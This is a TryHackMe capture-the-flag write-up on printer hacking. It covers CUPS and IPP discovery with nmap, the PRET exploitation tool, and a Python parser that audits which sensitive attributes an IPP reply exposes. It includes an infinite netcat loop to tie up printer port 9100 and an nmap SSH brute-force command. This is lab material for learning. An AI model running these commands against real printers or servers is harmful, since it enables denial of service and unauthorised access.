Date: 13, December, 2020
Author: Dhilip Sanjay S
Click Here to go to the TryHackMe room.
- CUPS Server (Common UNIX Printing System)
- IPP (Internet Printing Protocol)
- PRET - Printer Exploitation
- Printer Security Testing Cheat Sheet
- Locating Printers

  ```
  python pret.py
  nmap -p 631 <IP_RANGE>
  ```
- Exploiting
  - Three options in PRET:
    - PS (PostScript)
    - PJL (Printer Job Language)
    - PCL (Printer Command Language)
  - Try out all three languages to check which one the printer understands:

    ```
    python pret.py laserjet.lan ps
    python pret.py {IP} pjl
    python pret.py /dev/usb/lp0 pcl
    ```
  - Once you get a shell-like output, type `help` to see the different commands available.
- Answer: 631
- Impact
- An open IPP port can expose a lot of sensitive information such as printer name, location, model, firmware version, or even printer wifi SSID.
- Answer:

  ```
  while true; do nc printer 9100; done
  ```
- Explanation:
  - Replace `printer` with `<PRINTER_IP>`.
  - Since it is an infinite loop, the printer will remain busy.
Review the cheat sheet provided in the task reading above. What attack are printers often vulnerable to which involves sending more and more information until a pre-allocated buffer size is surpassed?
- Answer: Buffer Overflow
- Use any of the following:
  - Metasploit
  - Hydra
  - Nmap
- Using nmap:

  ```
  nmap <MACHINE_IP> -p 22 --script ssh-brute --script-args userdb=user.txt
  ```
  - Since we know the username, `user.txt` must contain only `printer`.
- Answer: Skidy's basement
- Steps to Reproduce: Visit `http://<MACHINE_IP>:631/printers/`
- Answer: 1k
- Steps to Reproduce:
  - Visit `http://<MACHINE_IP>:631/printers/Fox_Printer`
  - Select the `Print Test Page` option from the drop-down box.
  - The jobs will be listed at the bottom of the page.
  - Check the `size` column in that table.
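
The Impact note above says an open IPP port discloses details such as printer name, location and model. As an added example (not part of the original write-up), this Python parser decodes an IPP response in the RFC 8010 binary encoding and reports which of those attributes a reply gives away, so you can audit what your own printers answer with; the sample reply and its values are constructed, and the attribute names are the standard IPP ones, not values from the room.

```python
import struct

# Standard IPP attribute names for the fields the Impact note lists as sensitive.
SENSITIVE = {"printer-name", "printer-location", "printer-make-and-model",
             "printer-firmware-string-version"}

def parse_ipp(data: bytes):
    """Decode an IPP response (RFC 8010 encoding) into (status, {name: [values]})."""
    pos = 0
    def take(n):
        nonlocal pos
        if pos + n > len(data):
            raise ValueError("truncated IPP message")
        pos += n
        return data[pos - n:pos]
    # Header: version major/minor, status-code, request-id.
    _major, _minor, status, _request_id = struct.unpack(">BBHI", take(8))
    attrs, name = {}, None
    while True:
        tag = take(1)[0]
        if tag == 0x03:                    # end-of-attributes-tag
            return status, attrs
        if tag <= 0x0F:                    # delimiter: a new attribute group starts
            name = None
            continue
        name_len = struct.unpack(">H", take(2))[0]
        if name_len:
            name = take(name_len).decode("ascii")
        elif name is None:                 # zero-length name = extra value of a 1setOf
            raise ValueError("additional value with no preceding attribute")
        value = take(struct.unpack(">H", take(2))[0])
        if 0x40 <= tag <= 0x5F:            # character-string value tags
            value = value.decode("utf-8", "replace")
        attrs.setdefault(name, []).append(value)

def exposed(data: bytes):
    return {k: v for k, v in parse_ipp(data)[1].items() if k in SENSITIVE}

def _attr(tag, name, value):
    n, v = name.encode(), value.encode()
    return bytes([tag]) + struct.pack(">H", len(n)) + n + struct.pack(">H", len(v)) + v

# Constructed, trimmed Get-Printer-Attributes reply (all values made up for this example).
SAMPLE = (struct.pack(">BBHI", 2, 0, 0x0000, 1) + b"\x01"
          + _attr(0x47, "attributes-charset", "utf-8") + b"\x04"
          + _attr(0x42, "printer-name", "Example_Printer")
          + _attr(0x41, "printer-location", "Example Lab, Room 1")
          + _attr(0x41, "printer-make-and-model", "Example Model 100")
          + _attr(0x49, "document-format-supported", "application/pdf")
          + _attr(0x49, "", "image/jpeg") + b"\x03")
```

`exposed(SAMPLE)` returns only the name, location and model entries; any attribute in that result is readable by whoever can reach port 631 on the printer.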

